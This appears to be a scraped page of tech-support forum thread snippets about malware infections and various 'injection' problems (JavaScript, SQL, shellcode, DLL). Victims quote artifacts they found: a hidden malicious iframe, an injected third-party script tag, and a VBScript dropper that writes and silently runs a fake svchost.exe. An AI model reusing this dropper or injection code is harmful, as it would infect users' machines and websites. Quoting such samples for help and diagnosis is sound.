Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!Do not Attach logs unless I ask you to.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.Do not run any other tool untill instructed to do so!In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.Note** If you are having problems posting the complete log into this thread upload them here http://www.rapidshare.com/ and post the links in this thread Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.I would like you to run these programs again and send me these new logs and let me know how things are doingDeFogger: Please download DeFogger to your desktop.Double click DeFogger to run the tool. The application window will appear Click the Disable button to disable your CD Emulation drivers Click Yes to continue A 'Finished!' message will appear ... Read more

7 more replies
Answer Match 42.84%

PLease can sommeone help me i have no ideea what is that.....
''Runtime Error (at-1:0)
Cannot import dll:C:\documents\user\Locale...\Temp\.....\Injectior .dll''

This appears when i try to instal a program.... pls Help

More replies
Answer Match 42.42%

This is a new, Lenovo G50 with windows 8. The owner whom i am working on their behalf downloaded a bogus flash player update that came with everybody's favorite add on programs. Programs like OptimizerPro and that helpful guy with the headset that tells you to call to get rid of him. Anyway, I decided to perform a system restore. After which I ran scans with JRT, ADW, Malwarebytes, spybot, then i looked through startup options with Autoruns and all seemed well, until, he tried to log into his webmail. Some script error appears on screen, the error it's self is not so much an error as just a buch of code that tells me nothing. I used f-12 developer tools in Chrome and IE and found that one thing seems to stick out. First ill post the main error below.
', f ? f(document) : '') function color(s) { document.bgColor = s } function hint(s) { top.window.status = (s ? s : '') return true } var doc = document var form = document.form var form1 = document.form1 var form2 = document.form2 var errno = 0 if (arg.length > 6 && arg.substring(0, 7) == 'bgcolor') color(arg.substring(8, arg.length)) f = eval('parent.' + selfname + 'Init') if (f) f()
 

this really tells me nothing.  So with the f-12 tools i found this in the code under mbox.msc...

if (parent.mboxCB) parent.mboxCB()
</script>
<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script></head>
</html>

I'm sure this is the problem. I searched the ... Read more

A:.js injection wont go away!

DDS wont run. Says it wont run in compatibility mode, perhaps it doesn't work in 8?

28 more replies
Answer Match 42.42%

So as of late ive been getting these pop ups. in most cases I would think "alright run some adware/malware scans and check for updates to the pop up blocker. However this one has me stumped. The pop ups are coming through the steam browser. Which I don't know how to fix. I ran malwarebytes, super antispyware, comodo, and spybot, alas no luck. tried reinstalling steam as a last ditch effort but again no luck. I attached a picture of the pop up, roughly 90% are about a video player update, ranging from a generic "your video player is out of date" like the photo to ones who mimic flash. There are others but malware bytes blocks the page from loading some of them.

A:possible java injection

A moderator may now close this thread. I seem to have fixed the issue. It was an issue with my router being compromised not my computer.

2 more replies
Answer Match 42.42%

This is a new, Lenovo G50 with windows 8. The owner whom i am working on their behalf downloaded a bogus flash player update that came with everybody's favorite add on programs. Programs like OptimizerPro and that helpful guy with the headset that tells you to call to get rid of him. Anyway, I decided to perform a system restore. After which I ran scans with JRT, ADW, Malwarebytes, spybot, then i looked through startup options with Autoruns and all seemed well, until, he tried to log into his webmail. Some script error appears on screen, the error it's self is not so much an error as just a buch of code that tells me nothing. I used f-12 developer tools in Chrome and IE and found that one thing seems to stick out. First ill post the main error below.
 
', f ? f(document) : '') function color(s) { document.bgColor = s } function hint(s) { top.window.status = (s ? s : '') return true } var doc = document var form = document.form var form1 = document.form1 var form2 = document.form2 var errno = 0 if (arg.length > 6 && arg.substring(0, 7) == 'bgcolor') color(arg.substring(8, arg.length)) f = eval('parent.' + selfname + 'Init') if (f) f()
 

 
this really tells me nothing.  So with the f-12 tools i found this in the code under mbox.msc...
 
if (parent.mboxCB) parent.mboxCB()
</script>
<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script></head>
</html>
 

I'm sure this is... Read more

A:.js injection wont go away!

Thanks for the move, wasn't sure what to put this under.

4 more replies
Answer Match 42.42%

Hi all,

I'd appreciate your help with some problems I have been facing.

I recently changed webhosts and updated my wordpress site: guitarbench.com

Soon after the move, I received emails that the site was flagged by AVAST. Removal of some IP to world map trackers solved that issue.

Then I noticed a lot of issues with the visual editor and reinstalled wordpress automatically as per wordpress.org faq advice. Soon after, I was getting a blank page on my dashboard. Looking through the process, Dashboard would fine but then try to reload to a blank page. I noticed that page was trying to load to www.foreigntechnolonies.com. A look through the page source and I found this: "http://foreigntechnologies.com/ivanyuk/JU3Zgt3HDr.php" which I didn't recognise.

Then a look through my folders showed: gifimg.php which looks like a PHP Script Injection Exploit.

I deleted the gifimg.php files- but no difference so I deleted all the .js files with the write:script in- also no difference. Than I disabled all the plugins- and it solved the problem. I narrowed it down to the add everything plugin which I then deleted. That seemed to solve the problem. So far so good, but then after adding back the .js files I deleted, all the time checking to see if the site worked ok. When I got to the end, the site came down with the same problem, again. So I repeated the same process: except there are no gifimg.php files left and now it doesn't solve the problem and the "http://... Read more

More replies
Answer Match 42.42%

today i was installing my new printer and i have comodo firewall. when i was in the middle of the process, comodo came up and told me something about a shellcode injection. i clicked terminate. what was happening to my computer?

A:shellcode injection?

oh yeah and it said something like this "Possible buffer overflow attack"

2 more replies
Answer Match 42.42%

Asus EEE Celeron M 900 1G
Windows XP Home Ed. 2002 SP2
Comodo Firewall, Avira AntiVir
Firefox 3.0.3

I downloaded a real player install from a very well known site in the uk to get live sports radio online... During installation, Comodo firewall continuously gave me warnings that realplay.exe was trying to control a bunch of my processes and tried to access memory. I have read about real player being badware so I allowed the firewall to continue assuming that it was 'normal'.. Since I only needed the player for a few hours I uninstalled it. 1 day later, while browsing, Firefox stopped reacting to the mouse and opened a few unrelated new windows. PC didn't react for about 10sec until Comodo gave me a shellcode injection warning from AcroRd32 .exe - that I blocked - thus isolating AcroRd32.exe. There were no adobe progs running or pdf links clicked at the time. I remember some real player trying to control AcroRd32.exe during install so I imagine it might be related.
Please help me on this 1, I usually reinstall the whole PC when there's a problem but I'm not sure if that's necessary now.

Thank you!

More replies
Answer Match 42.42%

Check this one out, i read an article on how this was done the other day (How they are trying to use domain names that appear to be genuine) and low and behold we got an email.
Check the java script as well and see how they use that to inject. If i find the article i will post here.
http://urlquery.net/report.php?id=1476922199803
What i found interesting was this

if (window.location.hostname.split('.').pop().search(/edu|gov|mil/) < 0) {

More replies
Answer Match 42.42%

Say if I have a program in windows and I have no access to its source code, I want to redirect the data send to it to my custom program first. Anyone willing to share how is it done? Or is it possible?
 

A:DLL Hooks API injection

6 more replies
Answer Match 42.42%

I was talking on MSN 8.0 and all of a sudden....some random person whos email i didnt get said hi and my msn(just msn) totally froze and wouldnt close. I opened my task manager and my cpu was at a firm 100% and wouldnt go down, but as soon as i ended the process through TM it went back to 4%....i believe im getting either MSN Injected or DDoS'ed. I've scanned my computer with basically every scanner known to man and it picks up nothing...ive closed a few un-needed ports and deleted a few un-needed exceptions on my firewall and i think its stopped but i want to be 100% sure....like my cpu lol. if anyone could verify what the problem is or if its DDoS or Injections thatd be great.
Thank you,
Nick

A:Injection Or Ddos

~bUmP~

1 more replies
Answer Match 42.42%

I want to script an online game with WPE PRO, but everytime I select the TARGET PROGRAM (IEXPLORER) its says: DLL INJECTION FAILED
anyone can help with it?
 

More replies
Answer Match 42.42%

Hey just read this.
"
Epic exploited two holes in windows 7 to gain access via a ghost remote injection and crash allowing complete control of the kennel will be releasing the two zero days in a few weeks once I've had my fun."
Think it is possible.

A:Ghost Injection

Link?

9 more replies
Answer Match 42.42%

About an hour ago I did an error check on my C drive. I had to restart my computer to do it and after it was done and I had logged back in Comodo Defense had blocked the application explorer.exe. I wasn't browsing the internet in FireFox yet. It said "this is typical of a buffer overflow attack". It said it isolated explorer.exe from the rest of the system and will continue to do so unless I skip the alert but it is strongly recommended that I close the application and contact with it's vendor for a fix. So, I hit terminate and here I am.

Now what? Nothing happened when I hit terminate. Under defense events it says the application is C:\windows\SysWOW64\explorer.exe and the flag is Shellcode Injection. Like I said, it didn't alert me until an hour ago but under defense events it's listed as also happening at 11:43 last night. I believe windows ran something last night, can't remember what. I think it was a Windows virus scan or something, it wasn't Comodo that ran it.

I am currently running Comodo virus scan to see if anything is in there, but so far nothing. What's a vendor and how do I contact them to fix explorer.exe? Is this something to be concerned about? I'm decent with computers but I don't know a lot, so please keep that in mind.

A:Shellcode Injection

Try reseting IE to its defaults first. Tools > Internet Options > Advanced > Reset button. Are you running IE8 or IE9?

3 more replies
Answer Match 42%

On one of the sites I order from, when I try to access the status page for my orders, I get the above warning from my free AVG 8.5 edition. Yet, when I scan my computer, nothing turns up. How do I get rid of the above warning so I can access the page referred to? Thanks
I have Windows XP Media Center Edition Version 2002 Service Pack 3
 

A:exploit script injection-358

7 more replies
Answer Match 42%

Hello,A couple websites which I work with has been hit with this:<iframe src="http://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe;>After consulting a website specific to helping out with those types of problems, they told me to get my computer checked here.I have done two malware & virus scans along with a Hikack This log...all below.I am VERY frustrated and would like to get this over with.Thanks,DN---Malwarebytes' Anti-Malware 1.38Database version: 2413Windows 5.1.2600 Service Pack 37/12/2009 10:35:08 PMmbam-log-2009-07-12 (22-35-08).txtScan type: Full Scan (C:\|D:\|F:\|)Objects scanned: 296131Time elapsed: 56 minute(s), 39 second(s)Memory Processes Infected: 0Memory Modules Infected: 0Registry Keys Infected: 0Registry Values Infected: 0Registry Data Items Infected: 0Folders Infected: 0Files Infected: 0Memory Processes Infected:(No malicious items detected)Memory Modules Infected:(No malicious items detected)Registry Keys Infected:(No malicious items detected)Registry Values Infected:(No malicious items detected)Registry Data Items Infected:(No malicious items detected)Folders Infected:(No malicious items detected)Files Infected:(No malicious items detected)---KASPERSKY ONLINE SCANNER 7.0 REPORT C:\Documents and Settings\Derek\Local Settings\Temp\~TM30.tmp Infected: Backdoor.Win32.Zdoogu.em 1 C:\Documents and Settings\Derek\Local Settings&#... Read more

A:Trojan/Maybe SLQ Injection - Logs

Hello #41baby and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resu... Read more

2 more replies
Answer Match 42%

Thwarting SQL Injection Threats.

New Dark Reading report explores what database developers and database administrators can do about the pervasive SQL injection attack

Note: This article is targeted to SQL application developers and administrators - makes for interesting reading since virtually all browsers use MySQL internally, and SQL injection attacks can affect us all.

-- Tom
 

More replies
Answer Match 42%

Last week, I do not remember the day exactly but I believe on 2/2/2016 I downloaded and installed a free screen recording application called CamStudio. It seemed legit but it asked to install a bunch of other stuff which I declined, then went ahead and installed a bunch of other stuff anyway. This affected all the browsers on my computer (Chrome, IE, and Firefox), changing the search to "Bing" or something that looked like Bing, and installed some other programs that I noticed.

I tried removing all of it and everything seemed fine until I was notified today by a user of a website that I maintain (hosted at GoDaddy) that the site looked strange. Sure enough it is completely messed up. I have not uploaded any new files to the site in the last week but when I look at the source code for the index page I see strange links to javascripts that are not supposed to be present, and redirects appended to links on the page.

The two scripts I notice immediately are "us.clickscart.in" and "us.browserupdatecheck.in". I have attached a screenshot.

To conclude, my issue appears to be similar to this user's: My Help Thread: Get Rid Of Javascript Injection

Before I came across this forum I read on some other sites and ran an AdwCleaner scan and clean, but did not keep the log file it may have created. From this point I will follow only the instructions given me in this thread.

Yes, I do have access to the original Windows 7 install disk. I also... Read more

More replies
Answer Match 42%

I use Kaspersky Internet Security 2010. They claim that all third party programs interfere with its detection somehow. I have Malwarebytes' Amti-Malware on my HP and ran it yesterday. It found a little over 7 pieces of malware that Kaspersky never blocked. Only one was in my Temporary Internet Files folder. All the other ones were scattered across my user account (administrator). Is this product work keeping if it lets Trojan Downloaders and other junk in like that? Malwarebytes did find 3 Trojan Downloaders, I think it also found a couple of Spyware files too. Malwarebytes didn't find any infections today. Whether there are more on the machine that it doesn't have a signature for I don't know...

Has anybody who is using KIS 2010 had this problem? I have KIS to run a Quick Scan and Update every hour so I know that it's updating.

Does anyone know of any other internet security product that has good detection, and is either strong or sturdy?

A:Malware Injection Surprise

Hello,

Your predicament sounds all too familiar. When I bought my Dell computer, it came free with McAfee. It blocked an average of two infections a month. My licence then expired, and I got Kaspersky, because there was a special offer, and I could get it free. My internet usage did not change, but in two years it blocked three infections, and it found another three on the system. Very unimpressive results, but I continued to use it.

I then caught some very nasty malware indeed, and after that I decided to switch. I switched to MSE and have been infinitely happier. I never liked the user interface of Kaspersky, and hated the Firewall enough to switch back to the Windows one. I urge you to try MSE at some point, even if you switch back.

If you still believe you are infected, tell us. I am currently taking a degree in Malware Removal, so I cannot help you, but there are other members who can.

Rant over!

Richard

9 more replies
Answer Match 42%

Hello, so about a month or two ago I removed a real nasty rootkit I got from a torrent (silly me, trusted downloaders only!).
Anyways, all has been fine, no issues, i'm very anal about keeping my computer clean.
Today however, I was browsing facebook, and my entire computer froze. I hit the hard reset button on the outside of my case, which did nothing for about 15 seconds and then my computer shut off instantly. No reboot, either. Thinking, hmm, this is suspicious, maybe it's a hardware problem -- I went to my event viewer, and I found nothing hardware related, no errors, warnings, or critical messages other than the unexpected shutdown, and this little puppy.
Warning - Event ID 11 - Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications.
 

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Wininit" Guid="{206F6DEA-D3C5-4D10-BC72-989F03C8B84B}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x4000000000000000</Keywords>
<TimeCreated SystemTime="2015-03-28T18:46:33.452427800Z" />
<EventRecordID>368427</EventRecordID>
<Correlation />
<Execution ProcessID="788" ThreadID="820" /... Read more

More replies
Answer Match 42%

Anatomy of a SQL Injection Attack.

"SQL injection has become perhaps the most widely used technique for compromising Web applications, thanks to both its relative simplicity and high success rate. It's not often that outsiders get a look at the way these attacks work, but a well-known researcher is providing just that. Rafal Los showed a skeptical group of executives just how quickly he could compromise one of their sites using SQL injection, and in the process found that the site had already been hacked and was serving the Zeus Trojan to visitors."

Los's original blog post has more and better illustrations.Click to expand...

-- Tom
 

A:Anatomy of a SQL Injection Attack

Yikes, I'd hate to be the guy responsible for coding that site when the CEO left that conference.
 

1 more replies
Answer Match 42%

Is there any conflicts or protection with/for Low Level Code Injection into processes? Also, turning off DEP is the same as it was on vista correct?

Thanks, Dante

A:Low-Level Code Injection

Why are you turning off DEP? Only turn DEP off on applications that do not support it! But leave it on, seriously.

2 more replies
Answer Match 42%

Hi,
I have a friend at work in security. He mentioned something about sql injection and said
I should check my site to see if it is vulnerable to that.

Is there any way I can test my site for that? also whats some of the other things a person
can do to make sure their site is secure from being hacked into?

Thanks. Dan
 

A:Is there a way to test my website against sql injection?

14 more replies
Answer Match 42%

My problem is the way one of my sites worked after I downloaded a file I did not want to. The file was off of 4shared(website) was not the right file and installed many programs to my computer. I got rid of those programs with "Programs and Features" in the "Control Panel" as well as "Revo Uninstaller" to get rid of those that would not delete. I thought things would work properly... I did several scans with Vipre(my antivirus) and when it wanted me to restart my computer, I did. After the restart, my homescreen background was fixed around which I did not know why. Then from there, I made sure things were "ok" again and I did another Vipre scan as well as a Windows Defender scan. I checked my browser (Firefox) and Audiotool(website) which I usually use all the time, did not seem to be working right. I tried different browsers but it just would not seem to load from link to link. The app in the site would not work as well. My only concern is the audiotool website. I dont know if that bad file put other bad things in my computer, but I really quite want this site to work for me. My flash player is fine and I also tried clearing Cache as well as site cookies. I did research and found out that the file may have been a Javascript Injection. When I looked at the source information for the site, I found one in there.
I only found one person online with the same exact problem as mine with the injection, but they never had it fixed. I cannot gi... Read more

A:My Help Thread: Get Rid Of Javascript Injection

Hello and Welcome to TSF,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download to and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My native language is not engli... Read more

8 more replies
Answer Match 42%

how to inject javaScript in as3.
any ideas???

 

More replies
Answer Match 42%

OK, I visited this site on Google using cache and when I visited it my AVG 8.0 Web Shield pop up saying that the file is infected. I went to the web shield page and here is what it looks like:What is this and am I'm safe? I'm scanned my computer and no virus was found. Please help, anything.

A:Exploit Script Injection 358

OK after running AVG 2 times, I noticed something weird. Look at the total objects tested...it is LOW compared to previous scans I did. Help?????

5 more replies
Answer Match 42%

OK, I visited this site on Google using cache and when I visited it my AVG 8.0 Web Shield pop up saying that the file is infected. I went to the web shield page and here is what it looks like:

What is this and am I'm safe? I'm scanned my computer and no virus was found. Please help, anything.
 

A:Exploit Script Injection 358

OK after running AVG 2 times, I noticed something weird. Look at the total objects tested...it is LOW compared to previous scans I did.

Help?????
 

2 more replies
Answer Match 42%

JavaScript injection attacks seem to be the in thing these days. Malware writers are increasingly utilizing such attacks as a better means to spread their work.As little as a year ago, the bad guys were dependent on enticing people to follow links that pointed to malicious websites (via e-mail, search links, or IM worms). Today, they are using JavaScript injection attacks to simply "steal" a website's visitors, and it has become something of a Swiss Army Knife for underground hackers to spread their malware worldwide....The malicious site attempts two different methods to attack its visitors. The first is an attempt to exploit a Microsoft MDAC RDS.Dataspace ActiveX Control Remote Code Execution Vulnerability (MS06-014)...The second attack attempted is a drive-by download, which affects not only the IE browsers, but also Firefox 1.0 & 2.0 browsers. This attack uses JavaScript to detect the browser's type, then uses Adobe Flash exploits to download and execute a malicious binary file onto the system...f-secure.com/weblog

A:Javascript Injection Attack

Oh great, more ways to get infected.....

4 more replies
Answer Match 41.58%

:angry:Hi, I don't know if any of you remember me or not (probably not and that's okay because let's face it - there's a ton of us in this group & none of us should expect to be THAT important - right?)

Anyway, in 2008 my windows xp/laptop was infected with a malware/adware scam. The short of it is that it turned out to be a SOAP bug (I just found that out today by searching through my system's files). At first when I posted on this site I was given the instructions how to (at least) keep the computer from doing it's shutdown process on me as this bug comes with an automatic system shutdown timer set for 60 seconds at startup. Some kind soul in this group gave me a command to enter in at the command prompt "shutdown -a" which is what I've been using since June of 2008 (roughly). So today I stumbled across the actual bug's program. I am pasting it into this post just below here so that (hopefully) someone within the group can tell me how to fix my problem without completely doing a system reset. I have an Acer Extensa 4620Z laptop & the Acer system comes with a system backup/restore within it that will completely reset the system back to when it was first purchased but I will lose everything (it's like having the memory wiped out). I really don't want to do that (duh) but right now I can't burn discs, download software from cd drive, download software from the net, install any software period as it says my sql is... Read more

More replies
Answer Match 41.58%

My daughter was playing a cd-rom yesterday and all of a sudden the mouse stopped working. I tried a different mouse and it didn't work. I got a message a little while later from Comodo that there was a possible shellcode injection. Never heard of this. At the moment I am running Spybot on the computer (using a neighbor's computer). Thank you so much for all of your help in advance!!!

Megan

PS If you could send a link to a site that has keyboard shortcuts with good, simple explanations, that would also help a bunch. I am pretty proficient on the computer but I don't know most of the technical names for stuff.
 

A:help! mouse not working/ possible shellcode injection

I have no idea if these are even connected. I have updated the driver for the mouse, device mgr says it is working fine. Spybot has not found anything. Thanks again!
 

2 more replies
Answer Match 41.58%

One of my clients got hit with some malware yesterday. I picked up the box, cleaned it and took it back this morning. When I hooked it back up the browser came up with Antivirusxp links and spam at the top of the web page. kind of an overlay to what ever web page its on. Thinking I missed something on my manual clean I ran combofix and several malware progs and nothing. Next step was hijackthis and process explorer. Again nada. Loaded firefox and its there also. Any suggestions? Its looking to me like I missed a rootkit.

TIA
Bromaz

A:Antivirusxp Browser Injection/Overlay - Help

Doing my own followup... Could not find the source of the overlay and customer ended up reloading the PC. This is the first in years I have been unable to nail.

Bfromaz

1 more replies
Answer Match 41.58%

I?m having an issue with getting Windows PE 3.0 to recognize hard drive. At least I think this is the problem. I?m attempting to boot a Dell Latitude E7470 Solid State Drive, Windows 7 64-bit machine from a WINPE3.0 USB thumb drive. Initially, before I dug into injecting drivers, I would plug in USB and boot from USB and the Windows PE grey splash screen would show and attempt to load system files and then it would fail and restart and load Windows partition normally.I try to boot from WINPE again and I press f8 quickly to access a command prompt, and run diskpart to see what drives are being detected. It turns out that WINPE3.0 is not detecting my solid state drive.I then search out the right drivers for this model and I find out that I need these two: Picture: https://sli.mg/5pV7nuI run 7zip to extract out these files/folders and then I run DISM to mount my boot.wim (from WinPE) and run the DISM command to inject the drivers into the unmounted .wim file.I try two different ways of injecting drivers:1) The first way is I use the DISM command to add in the drivers with the recurse switch option. I put all driver files above in one folder and run recurse. Picture: https://sli.mg/H9InCwThis inject works and takes a few minutes. I then unmount and commit and copy over my newly injected WINPE package and copy it over to my USB and attempt to boot and it gives me an error pointing to a .sys file. I tried deleting the .sys file but I realize that this won?t work because the .sys is... Read more

More replies
Answer Match 41.58%

Tech Insight: SQL Injection Demystified.

Attackers are using the old standby SQL injection en masse -- a look at the attack and how to protect your applications from it

-- Tom
 

A:Tech Insight: SQL Injection Demystified

Dear Tom,
My thanks will keep pouring in for various reasons! off-topic, i have bought two books dealing with Linux flavors-->Mandriva and Xandros! A senior member said MSlos is much easier for an absolute novice in Linux, like me! Kindly give your opinion,please!. I had a bad trip with UBUNTU( hope you remember--i expect you not to, because you deal with so many guys like me!)!
 

3 more replies
Answer Match 41.58%

Does anyone know if there is a version of this out there that still works or has Microsoft already fixed this problem because if they havn't could you provide a download link. I need this so that I can have administrative ability in cmd to be able to use C:\Windows|System32>mkdir testl.

More replies
Answer Match 41.58%

Several weeks ago, I asked a question in my profile status:




Could a malware running inside the sandbox attack the memory of a process running out of the sandbox?Click to expand...

The link to that status: Online_Sword

Here are some (not all) replies to that profile status:

@Klipsh




Of course, sandbox evasion is not a myth.Click to expand...

@hjlbx




This is how some CVEs work. So possible, yes. Somewhere in OS and all other softs there lies undiscovered vulnerabilities of all types. COMODO functionality address this sort of thing, but technical infos hard to come by...Click to expand...

@DracusNarcrym




Ah, I see. In that case it would be preferred that the sandbox terminate any executable that attempts to perform operations such as injecting code in running process images - since the whole "clone process" deal is not possible.Click to expand...

In my own reply to that profile status, I said that I would do some tests by myself. However, at that time I only had some malware samples which inject the memory of other processes with the technique called "Process Hollowing". By contrast, I hope to do some tests with malware samples that directly injects into other processes instead of using the technique "Process Hollowing". Following is an introduction of "Process Hollowing" written by @itman (thanks ) in wilderssecurity:




"Classic" process hollowing takes the form of the... Read more

A:Memory Injection Inside Sandbox

Your tests so far certainly confirm our suspicions that using code injection, from within the sandbox, in non-sandboxed memory images, is not feasible.

At least the two outlined techniques failed.

Perhaps there are other methods, maybe not as effective/advanced, but "primitive" enough for sandbox software to overlook them.
 

1 more replies
Answer Match 41.58%

Hello everyone,
 Im Pablo from Brazil and i get my PC very very low to use few days ago, and today unfortunately i got infected by a template that i download on internet..

DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

I found a topic in this forum from 2010 (http://www.bleepingcomputer.com/forums/t/335436/svchostexe-script-injection-into-local-html-files/) and i already did the first steps (Combofix as comfix and already run), heres the log..

ComboFix 14-10-29.01 - Pablo 05/11/2014 3:03.2.2 - x64
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.55.1046.18.4010.2333 [GMT -2:00]
Executando de: c:\users\Pablo\Desktop\comfix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((( Outras Exclusões )))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\program files (x86)\microsoft\watermark.exe
c:\windows\SysWow64\dmlconf.dat
.
.
(((((((((((((((( Arquivos/Ficheiros criados de 2014-10-05 to 2014-11-05 ))))))))))))))))))))))))))))
.
.
2014-11-05 05:11 . 2014-11-05 05:11 -------- d-----w- c:\us... Read more

A:svchost.exe script injection html

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/554800 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

2 more replies
Answer Match 41.58%

Hello Bleeping Computer
I'm currently trying to fight against this spambots on my computers / internet.
We have currently three computers running on the same IP that is getting blacklisted. I did a MBAM scan today and I thought it would help, seems like not, for 7 hours ago CBL got reports about another spam from my IP. 
On this computer I'm making this thread on had 0 virus, but the two others had 82 and 89.
I will start out with my main computer.- FRST LOG -
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-08-2016 01
Ran by Vedel (administrator) on VEDEL-PC (25-08-2016 06:20:33)
Running from C:\Users\Vedel\Downloads
Loaded Profiles: Vedel & DefaultAppPool (Available Profiles: Vedel & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: Dansk (Danmark)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvscpapisvr.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation... Read more

More replies
Answer Match 41.58%

Anti-code injection framework.

A new company, Recursion Ventures, has been formed by Dan Kaminsky, Michael Tiffany and Henry Bar-Levav to take a fresh approach to computer security. Recursion Ventures Interpolique framework is aimed at helping developers make their web applications immune to SQL injection and cross-site scripting attacks. The basic idea is to transform data entered by the user into Base64 so that, even where it's constructed incorrectly with additional code, it's unable to cause any damage.

-- Tom
 

A:Anti-code injection framework

 

1 more replies
Answer Match 41.16%

I keep getting this Altnet thing coming up on my Spybot and AdAware. Here's my Hijack This log:

Logfile of HijackThis v1.97.3
Scan saved at 10:40:50 AM, on 12/18/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MPFSERVICE.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\AdvTools\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\lxamsp32.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\System32\pctspk.exe
C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\program files\qttask.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
